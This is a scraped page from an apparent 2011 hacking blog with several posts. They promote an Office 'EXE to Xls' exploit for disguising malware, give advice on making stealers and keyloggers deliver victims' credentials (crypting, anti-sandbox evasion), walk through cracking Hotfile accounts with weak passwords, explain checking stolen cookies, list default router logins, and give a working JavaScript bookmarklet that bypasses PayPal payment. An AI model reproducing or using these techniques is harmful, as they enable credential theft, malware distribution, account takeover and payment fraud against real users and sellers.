fileserve (long) :it is the "cookie"

to check a cookies 
1)take cookies copy
2)press "add" or "past from clipboard" to add cookies
3)choose "hotfile" or "fileserve" or"megaupload" or.........
4)press start
5)"start button" will change to "stop" , wait until it change to "start" again and the working cookies will be placed in the textbox (large one)

note :
- you can use "past-start" to skip step 2 & 4
-this program isn't adware or spyware
-file size is 15 Kb only (Very simple program )


Scan Report :

Read More Add your Comment 0 comments

Windows Xp Doosha [Best look For You Windows]



CCleaner 2.3.1
K-Lite Mega codec pack 5.9.5
AIMP2 mp3 player 2
Winrar Corporat 9.3
Internet Download Manager 5.19.2
Mozilla Firefox 3.6












Part 1 :
Part 2 :

Read More Add your Comment 6 comments

EXE to Xls Exploit [ms office exploit

EXE to Xls Exploit [ms office exploit] Tutorial by: -Mr.MindfReak™EXE to Xls Exploit [ms office exploit] Tutorial by:-Mr.MindfReak™

[Image: 19370769.png]This Exploit will Convert your malware {bot} ,i.e any exe file to .Xls {office document}

Before you attempt to use this Exploit Make Sure you have "Perl" Installed

Usage:-Watch Video in Full Screen for HQ..

The converted output file will not be fud i.e .Xls Document but you can hex it to make it Fud{No so Easy Though}

Password is:- darkhk3r
Download Link:-
Download Link:-

Read More Add your Comment 0 comments

20 reasons: Why people don't receive logs via stealer or KeyLogger

20 reasons: Why people don't receive logs via stealer or KeyLogger

Many of you might have tried many stealers and keyloggers to get logs of your victims.
You might have registered on various FTP, PHP sites or even emails to test and get logs of your victims.
I have seen many people complaining about stealers or crypters and KL's. So, this thread may be the right solution/place for you.
Well, if you are not getting logs that doesn't mean stealer or KL is not good or hosting site is bad.
KL = keylogger
There are various reasons why people don't receive logs many times.
I will discuss some of the reasons, which I know. If you know more than these, please feel free to post.
Also, if at some point, I am wrong, please correct me.

Reason 1:
You might have entered wrong FTP, PHP info. This is because many people don't know how to put right PHP or FTP info into stealer or KL.

Reason 2:
May be your firewall is blocking access to your file.
If your target has powerful firewall (like ZoneAlarm, Outpost etc...), then it WILL suspect some suspicious behavior and pop-up Internet access privilege. If your target is smart enough, then he/she may block access to your file.

Reason 3:
You never know who is downloading your file (EXE). If the user is capable enough to ollydbg your file, he may easily get your FTP info (if file is not hardly crypted). If the user is smart enough, he may VMWare or Sandbox ur file and may delete ur file after seeing such external access info.

Reason 4:
Many stealers or KLs use UDP connection instead of TCP, for example Stealer2600.
UDP is very much unreliable as compared to TCP. So, UDP doesn't provide error checksum or resending of data. If ur stealer or KL is using TCP connection, then its much better.

Reason 5:
Sometimes it may happen that FTP or PHP host is down for some reasons (like backup or upgradation etc...). At that time, ur stealer will send info to the host, but as the host is down, u won't get logs.

Reason 6:
If your stealer or KL is FUD, say today on 7th Aug. It may become detected on 8th or 10th of August. You may never know. So, it won't be FUD anymore and AV's will delete it or may be FW will block access to your file.

Reason 7:
If your target has powerful AV's like Kaspersky, Avast, Nod etc..., they have Heutistic scanning. This may also prevent file from opening.
If ur exe is anti-Kaspersky or such like that, then well and good.

Reason 8:
Make sure your EXE is FUD and with many Anti-methods like anti-anubis, anti-sandbox, anti-VMWare, anti-debugger, anti-emulator, anti-sunbelt etc... (There are hell lot of anti-methods, i just explained a few)...
If ur exe is not anti with any of the above methods, then it may get detected, even by a n00b :P

Reason 9:
Sometimes, while stealer is sending logs 2 ur FTP or PHP, some packets may lost while traveling to ur host. This is because of many reasons, like network congestion or bottleneck problems, etc...

Reason 10:
Sometimes, your host gets too busy and might come under very much pressure. So, it may stop responding and may not collect logs.

Reason 11:
Once you have distributed ur EXE and if ur using FTP acc to get logs, and then if change pass of ur FTP acc, then also ur exe will not send logs.
This is coz, suppose say, ur ftp login info is username: "hello" and password is: "123456". This is info is stored in ur exe and u distributed that. While uploading, ur exe will use the above info to upload logs 2 ur FTP.
If u change the password to "456789", then u know that u hv changed the password of ur FTP acc, but ur EXE doesn't know this. It will use the password as "123456". So, in this case also u won't receive logs.

Reasons 12:
Your Stealer or keylogger is a man-made software. It also requires maintenance and upgradation. Over a period of time, its may performance may decrease. This is also the reason of not receiving logs. But this happens very rarely, only if ur sticked 2 the same stealer for 2 years or more.

Reason 13:
Next reason is may be your crypter/binder/packer. If ur crypter does not support the stealer or KL which ur using, then it may corrupt ur exe.
So, choose the stealer and crypter combination wisely.

Reason 14:
Another reason is an operating system. Suppose say, ur stealer or KL is configured to run on XP SP1, SP2, SP3, NT, 2k and Vista.
If ur customers is using Windows 7, then obviously ur exe will not run on his PC as it can't understand how to execute.

Reason 15:
Another reason cud be 32-bit and 64-bit. If stealer or KL is configured 2 run only on 32-bit machines, then on 64-bit machines, it may not work, even if ur using XP and stealer is compatible with XP.

Reason 16:
If you dun hv good crypter and if ur FUDing ur file manually via Hexing, then make sure that u know proper hexing. Dun just go on google or on some forums and find hexing solution on FUDing ur file. You WILL corrupt ur EXE if ur dun understand offset and other terms...
Using tutorial on hexing is a good choice but dun apply ur own logic with that hex tut if u dunno hexing.
Also, dun combine one hex tutorial with another hex tutorial.
This will definitely corrupt ur file. Hahaha, lmao......

Reason 17:
If ur customer doesn't hv stored passwords in his browser, then also stealer will not send logs or it will send empty logs.

Reason 18:
Say, ur customer is using Google chrome and storing passwords in it. If ur stealer is not configured 2 steal passwords from chrome, then also u won't receive logs.
So, choose a stealer which have good combination of browser (FF, IE, etc...)

Reason 19:
Suppose ur EXE is FUD and is less than 20MB and if ur customers scans ur EXE under virustotal, or jotti, then ur EXE will get detected by many AV's and within few days, it will get detected easily and AV' will delete it.

Reason 20:
Even if ur EXE is 0/24 (FUD) on NVT, but if ur victims scans ur exe under Anubis, then mostly Anubis will show all the info after executing ur exe. This may alert ur customer and he may delete ur file.

These are the reason which I know, why people don't receive logs. If you know more than these, please post.

Read More Add your Comment 1 comments

Cracking Hotfile Accounts

Cracking Hotfile Accounts [Mr.MindfReak]
1st download teh Hotfile AIO Cracker v1.0
Virus scan if ya paranoid:

This is a simple cracker to use and you do not even need to deal wit using proxies, and there is 2 ways to go about this

1. Load a list of usernames before anything, most common words are registered usernames, but if your lazy here's a list of usernames you can use

2. Now for passwords you can either
A - load a small password list of around 50-100 passwords (you don't need anymore then this as most hotfiles have very weak common passwords)
B - You can set the cracker to do username as the password (a lot of hotfile accounts have their password as their username) this is in the Extra Options tab

3. Set the sockets to 30, and the timeout to 9000.

4. Hit start and your good to go. Cracked accounts will start showing up as they are hit. I have selected the option to run the username as the password in this screen shot and cracked quite a few accounts in the 1st minute
[Image: hotfile.jpg]

Now the only thing is checking every account to see if they are premium or not. If you want just crack premium accounts, you can select the option but you will need proxies for this. The nice thing is that the cracker has a built in proxy checker so it will check and save the good proxies for you.
Here's some proxies if you want to run it with em.

Read More Add your Comment 6 comments

How to run your own private chat server

How to run own private chat server NO CONFIGURATION NEEDED!You will need:
HachaT Server
HachaT IM Client
both can be found here:

From here on out it will be VERY simple!!

Step 1: Extract contents of both files.

Step 2: Start your HachaT Server and Client programs.

Step 3 (a little bit harder):
Goto and make an account.
Login and click the "Hosts/Redirects" tab.
Click "Add New" on the menu bar to the left.
Change the host name to what you want and don't change anything else.
Click "Create Host".
Now goto
Download and Install the No-IP Client.
Log into your No-IP client and click "Select Hosts".
Make sure that your host is checked.
Click File;Preferences; and make sure "Run on Start up" is also checked.
Now click refresh on the main client page.

Step 4 (only for people on routers): Port forward to port 2323 using this tutorial as a guide:

Step 5: Type your host link (like this '' leaving out http://) and a nickname. Than click connect

Step 6: Share HachaT with your friends and tell them yr server info!

Read More Add your Comment 3 comments

How To Port Forward (Router & Modem Style)

What Is Portforwarding?

Port forwarding is necessary for using different tools, Such as RATs and uTorrent and so on. Please follow this guide on How To Port Forward and you'll have your port forwarded :)!

Today i'll teach you how to port forward through the router & modem. (Not with PFConfig :) )

Lets Start!

Start off by going to: Start -> Run -> CMD -> And Type IPCONFIG
[Image: FASDASD.png]

Now Copy That "Standard Gateway // Default Gateway" IP And Type It Into Your Webbrowser & Log in.
[Image: IP_2.png]

My username is Root - nothing. The router // modem accounts usually are theese:

Admin -
Admin - Admin
Admin - Password
Admin - User
Admin - Root
Admin - Custom Password, Check underneath your router for it! ;)

Root - Admin
Root -
Root - Password
Root - Root
Root - Password
Root - Custom Password. Check underneath ;)

User - Root
User -
User - Admin
User - Password
User - User
User - Custom Pass.

And so on.

Once you're logged in, Go to the "port forwarding" or in this case, "Virtual Server"

[Image: Ip_3.png]

[Image: DASDSAD.png]

Virtual Server: Enable / Disable.
Local IP: Found In IPConfig, As IP Adress.
Start Port: The Port You Want To Forward, Start Port.
End Port: The Port You Want To Forward, End Port.
Protocol: TCP & UDP or BOTH
Remark: The Name Of The Wished Forwarded Program.

And When You've Saved The Settings, Go To And Type Your Port In There, And If It Says

[Image: Ip_5.png]

Then You've Succeded Your Port Forwarding.

If It Says

[Image: Ip_6.png]

You've Failed. Then I Advice You To Take A Look At And Look For Your Router Or Modem, Once You Find It They Have A Port Forward Tutorial There.

Read More Add your Comment 0 comments

HachaT IM by eL3ET

[Image: Client-and-server.jpg]

The time has finally come for me to release HachaT (pronounced Hack Chat), and HachaT Server.
HachaT is a free software alternative to MSN and Yahoo. You can run your own server free of registration set up or anything like that just double click and your server is up and running! (if you are on a router port forward port 2323).(if you are on a router port forward port 2323). To use the HachaT client just type in a Nickname and the server IP your trying to connect too.

Like I said this software is completely free and released under the GPL license! Have fun talking to your friends!

HachaT Client Download 

HachaT Server Download

Read More Add your Comment 0 comments

Bypass Paypal payment to get some ebooks and scripts for free

Just add the following in bookmark, or copy/paste it.
javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

When you are visiting a page using a paypal button, just click the bookmark or paste the code in the URL bar of your navigator.

If it works, you will be redirected to the download page Thumbsup
Else, try another site (or buy it Tongue)

It works with :
Chrome [X]
Firefox [X]
IE [?] (anyone can test it?)
Opera [X]
Safari [X]

A link the script works on :
If you find another link, please share

Read More Add your Comment 8 comments


© 2011 Learn Cyber Security All Rights Reserved Learn Hacking Online